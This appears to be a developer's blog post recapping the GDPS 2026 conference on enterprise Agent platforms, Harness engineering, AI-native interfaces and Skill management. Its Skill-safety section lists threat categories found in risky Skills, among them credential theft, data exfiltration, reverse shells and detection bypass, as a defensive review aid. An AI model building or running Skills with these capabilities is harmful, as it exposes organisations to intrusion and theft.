DEV Community

Cover image for Insights from GDPS 2026: Enterprise Agents, AI Native, and One-Person Companies
WonderLab
WonderLab

Posted on

Insights from GDPS 2026: Enterprise Agents, AI Native, and One-Person Companies

Insights from GDPS 2026

001

One strong impression I took away from GDPS this year was that AI discussions are no longer stuck at the level of “the model got better again.” The conversation is moving toward much more concrete engineering and organizational questions: how Agents enter the enterprise, how they are constrained, how they become reusable assets, and how they might eventually reshape team size and even company structure.

If I had to compress the whole conference into one sentence, it would be this: enterprise Agent platforms are moving from concept demos toward real engineering, while AI Native and the one-person company are becoming two outward-facing consequences of that shift.

I. Three Keywords and Industry Trends

  1. Three recurring themes: enterprise-grade “lobster” (enterprise Agent Platform) + AI Native Dev (a reshaped software development paradigm) + OPC (One Person Company). These were everywhere at the conference — AI is restructuring how we build software and how organizations work.
  2. OpenClaw has become the dominant Agent product pattern. Many “wrapper” products have appeared — a crowded field sometimes called the “battle of a hundred lobsters.”
  3. Skills are becoming core enterprise assets. Software engineering is entering an AI-native phase; competition shifts from headcount to depth of Skill accumulation.
  4. Memory, security & permissions, roles, and cost management are critical capabilities for enterprise Agent platforms.
  5. Harness engineering is on the rise: systems are slimming down faster, models are getting stronger, and everything is moving toward an Agent-centric world.

Put together, these keywords sketch a pretty clear path: stronger models lead to more employee-like Agents, and then enterprises start asking the harder questions. How do we package those capabilities into a system that is safe, stable, governable, and billable? In that sense, the Agent platform is no longer just a product question. It is an infrastructure question.

II. The “Battle of a Hundred Lobsters”: A Sample of OpenClaw-Style Product Names

腾讯 WorkBuddy — Tencent WorkBuddy
腾讯 QClaw — Tencent QClaw
腾讯龙虾管家 — Tencent Lobster Manager
腾讯云保安 — Tencent Cloud Security Guard
腾讯乐享知识库·龙虾版 — Tencent Lexiang Knowledge Base · Lobster Edition
字节 ArkClaw — ByteDance ArkClaw
智谱 AutoClaw — Zhipu AutoClaw
月之暗面 Kimi Claw — Moonshot AI Kimi Claw
阿里云 CoPaw — Alibaba Cloud CoPaw
阿里云 JVSClaw — Alibaba Cloud JVSClaw
阿里云 QoderWork — Alibaba Cloud QoderWork
百度红手指 Operator — Baidu Red Finger Operator
百度 DuClaw — Baidu DuClaw
科大讯飞 AstronClaw — iFlytek AstronClaw
MiniMax MaxClaw — MiniMax MaxClaw
网易有道 LobsterAI — NetEase Youdao LobsterAI
当贝 Molili — Dangbei Molili
智麻 ChatClaw — Zhima ChatClaw
矽速 PicoClaw — Xisu PicoClaw
博云 BocLaw — BocCloud BocLaw
ZeroClaw — ZeroClaw
万得 WindClaw — Wind WindClaw
小米 MiClaw — Xiaomi MiClaw
猎豹 EasyClaw — Cheetah Mobile EasyClaw
猎豹元气 AIBot — Cheetah Mobile Genki AIBot
京东灵犀 Claw — JD Lingxi Claw
快手 KClaw — Kuaishou KClaw
美图 Claw — Meitu Claw
360安全 Claw — 360 Security Claw
商汤 SenseClaw — SenseTime SenseClaw
华为小艺 Claw — Huawei Xiaoyi Claw
ToDesk ToClaw — ToDesk ToClaw
Enter fullscreen mode Exit fullscreen mode

III. How OpenClaw Enters the Enterprise

3.1 Risks of Bringing “Vanilla” OpenClaw Straight In

For now, the answer to dropping native OpenClaw into the enterprise unchanged is clearly no.

Personal users can tolerate something that is “good enough.” Enterprises usually cannot. They need explicit permission boundaries, traceable execution, cost accountability, role management, and reliable fallback mechanisms when something goes wrong. From that angle, native OpenClaw is hard to adopt directly not because it is unimpressive, but because it is naturally closer to a machine for individual creativity than a system for organizational governance.

002

003

3.2 What Solutions Exist Today?

There are two broad categories:

  1. Cloud-vendor offerings: OpenClaw-like products from players such as Alibaba Cloud Wuying, AWS, Baidu Cloud, etc. They ship with Harness-style infrastructure already in place — permissions, sandboxes, gateways, identity, load balancing, reliability, observability, monitoring — ready to use, with enterprises configuring Agents on top.
  2. Custom builds: Enterprises fork and deeply customize OpenClaw for their own stacks.

At a deeper level, this is a choice between buying an existing foundation and building a controllable one. The first path optimizes for speed. The second optimizes for fit. In the short term, cloud vendors will probably capture more immediate value. In the long term, companies that want Agents to become a core organizational capability usually end up building platform layers of their own.

AWS OpenClaw on AgentCore

004

Alibaba Cloud Wuying: JVS Crew

005

MemTensor: ClawForce

006

007

SenseTime: Raccoon Family

008

Baidu AI Cloud: DuClaw

009

Dreame Technology: DreameClaw

A fork built on OpenClaw that has already AI-enabled more than ten internal workflows — recruitment, approvals, and more.

010

3.3 Signals from Silicon Valley

The following is anecdotal — not a forecast — useful mainly for strategic thinking.

On March 31, 2026, material related to Claude Code leaked. It included an unreleased module named KAIROS, which reads like a sketch of an ultimate Agent form: a background daemon that keeps Claude always on; GitHub Webhook subscriptions to auto-start fix flows when new bugs appear; and a built-in “Dream” mechanism to consolidate and compress long-term memory when the system is idle — getting close to what people mean by truly agentic AI.

Separately, a Silicon Valley investor posted that OpenAI might ship an “AI employee” product around $2,000/month in April.

None of this is confirmed feature- or date-wise, but the pattern is clear: autonomous AI workers are where model labs and cloud vendors are placing bets.

To me, the key thing here is not whether each rumor turns out to be accurate. It is that the imagination behind those rumors is already converging. People are no longer satisfied with “an AI that can chat.” They are now talking about AI that stays online, notices problems, maintains memory, and collaborates on its own. The next round of competition will not only be about model parameters or isolated features. It will be about the operating mechanisms around Agents.

IV. Possible Directions for Enterprise OpenClaw / Agent Platforms

4.1 Harness Engineer

Mitchell Hashimoto, co-founder of HashiCorp, coined the term on February 5, 2026. Roughly six days later, OpenAI adopted it in their million-line-code experiment write-up.

011

What Harness Is: An Analogy from Computing

There is a Chinese idiom — let the horse run with loose reins — for acting without constraint. That is roughly how an Agent behaves without Harness engineering. Harness work is about tightening the reins on the Agent-horse and making it follow the path we define.

For a long time, Agent discussions focused on whether the model could reason, plan, or reflect. More teams are now realizing that the real determinant of system usability is not only whether the model is clever, but whether you have given it a good working environment. That is what Harness addresses. Instead of piling more orchestration logic around the Agent, you prepare the right tools, rules, permissions, and feedback loops for it.

012

Compared with computer systems

Computer System Component Agent Environment Component Description
CPU (Computing Power) LLM (Large Language Model) Provides core reasoning, computation, and generation capabilities.
Memory (RAM) Context Window Determines the amount of information and short-term memory the agent can handle simultaneously.
OS (Operating System) Harness (Engineering Framework) Provides process scheduling, permission control, interfaces, and operational constraints.
Application Agent Runs on top of the environment, utilizing resources to handle specific business tasks.

Frontiers in Harness

013

014

A Shift in How We Build Agents

We move from heavy orchestration to building Harnesses: you no longer need monstrous workflow graphs inside the Agent layer — orchestration logic folds into model capabilities. Patterns that used to live in Agents (intent routing, reflection on results) may become defaults in the models themselves.

The next focus is: what runtime we give Agents, which tools and Skills, and what constraints we enforce.

Put differently, the future gap may not come from who writes the most complicated flow, but from who is best at preparing the road for the model. The clearer the environment, the sharper the tool definitions, and the more natural the constraints, the more likely an Agent becomes stable production capacity rather than a demo that still needs human rescue.

015

4.2 What “AI Native” Means in Practice

Move from GUI-first to AIPI-first (API, CLI, shell) so AI can operate software directly.

016

This part resonates strongly with me. For the last few years, many demos of “AI operating software” have looked impressive. But once they hit production, the same issues show up: slow execution, unstable success rates, high maintenance cost. The problem is not only the model. A huge amount of software was never designed for AI in the first place. AI has to click buttons, read screens, and guess the next step like a human, which naturally makes the whole thing fragile.

This shift should show up not only in “AI efficiency” programs: every new feature should ask how AI will plug in; products should gradually expose machine-friendly surfaces.

Since 2024 I have tracked AI-driven UI test automation. Today, LLM control of phones and IVI still means: decompose steps, simulate taps on a human UI, read the screen, loop. From early AutoGPT to Zhipu’s open AutoGLM for phones — same pattern. Root cause: most software was never AI-native.

Our CES POC last year — AutoFlow driving Spotify — is the same technical path.

Why is test automation hard and AI control slow and flaky? Most interfaces are built for humans; AI has to pretend to be a user.

The endgame is AI-facing operation surfaces for every product — and the industry is already turning.

On March 28, Feishu shipped Lark CLI so tools like Claude Code can drive the full Feishu stack:

017

Chrome also has an open-source CLI path — AI need not drive the browser only by mimicking humans.

018

Open homework: in AI-efficiency programs, retrofit legacy systems toward AIPI; for new systems and features, design both human and AI interfaces.

I increasingly think AIPI will not remain just an “extra interface for AI.” It will gradually become a new software design default. Today we still ask whether we should expose AI-facing interfaces. In a year or two, the more natural question may be why a system still does not have them.

4.3 What to Watch When Building Skills

019

A. SAFETY

Security vendors analyzing ClawHub report 800+ risky Skills, spanning:

  • Malicious delivery and downloaders
  • Credential theft and phishing
  • Prompt injection and command hijacking
  • Data exfiltration and theft
  • Malicious scripts and generic detection bypass
  • Remote control and reverse shells
  • RCE and command injection
  • Supply-chain and untrusted installs
  • Spoofing and deception
  • Exploit kits and abuse tooling
  • Fraud and financial scams
  • System hijack and config tampering

Inside a company, Skills should live on a private Skill platform — that cuts most supply-chain risk. You will still pull Skills from the web during development, and internal authors can ship unsafe Skills. You need security review standards and review process.

Some vendors ship Skill-audit plugins with multi-dimensional scoring; we should invest in standards, methods, and tooling of our own.

If code repositories were the key asset layer in the previous software era, Skills may become a new asset layer in the AI-native era. Precisely because they sit closer to execution, permissions, and data, Skill security cannot be treated as a simple plugin problem. It has to be governed as part of the software supply chain.

B. PERFORMANCE

Measure accuracy and repeatability across runs — gate releases on those metrics.

C. COST

Unlike classic software, Skill work needs token awareness. Skill token spend is future R&D spend. Data is the moat; Skills are the AI advantage — halve token use versus a competitor on the same task and you ship an extra project for the same budget.

In implementation, design the shortest path to the outcome. Where RPA or a script can freeze a workflow, prefer scripts over “let the model improvise” — better stability, lower tokens. Example: unzipping files — don’t make the model guess tools or repeatedly self-author scripts; ship a script and document when and how to call it. That is Harness thinking too.

Many teams still evaluate Skills from the angle of “can we make this work?” Once you enter the enterprise, the more important questions become “can we make it work reliably?”, “can we make it work cheaply?”, and “can we make it work at scale?” That is why I increasingly think the real difference between companies will not only come from model selection, but from how quickly they accumulate Skill assets and Harness engineering capability.

V. A Final Take

GDPS made me more certain of one thing: competition in enterprise Agents is shifting from “who connected to a large model first” to “who industrializes AI Native architecture, Skill assets, and Harness engineering first.”

OpenClaw represents the explosion of Agent product form. Harness Engineering represents the maturation of the engineering method. AIPI represents the shift in software interface design. OPC represents the organizational consequence that may follow. They look like separate topics, but they are all pointing to the same trend: AI is not just a new tool. It is rewriting how software is built, invoked, governed, and ultimately how companies themselves operate.

Top comments (0)